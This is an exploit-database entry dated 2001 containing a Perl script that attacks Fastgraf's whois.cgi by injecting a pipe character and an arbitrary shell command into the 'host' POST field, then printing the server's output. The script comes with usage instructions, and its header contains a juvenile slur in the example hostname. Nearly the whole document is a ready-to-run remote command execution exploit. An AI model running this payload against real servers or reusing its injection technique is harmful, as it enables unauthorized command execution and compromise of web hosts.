Fastgraf's whois.cgi Remote Command Execution Exploit

2001-01-12T00:00:00
ID 1337DAY-ID-11578
Type zdt
Reporter n/a
Modified 2001-01-12T00:00:00

Description

Exploit for cgi platform in category remote exploits

                                        
                                            =====================================================
Fastgraf's whois.cgi Remote Command Execution Exploit
=====================================================

#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - [email protected]            #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #                           
#                                                             #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite         #
# Greets to sigmo for finding stupid POST examples            #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;))       #
#                                                             #
# Use like this:                                              #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al"          #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto    => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection 
sysread($sock, $buffer, 100000);
        ($empty, $output) = split(/PRE/, $buffer);
        $output =~ s/[\<\>\/]//g;
        if($output) {
        print("$output\n");
       } else { print "No data, or not vulnerable\n";
     }
    } 
close $sock;




#  0day.today [2018-01-03]  #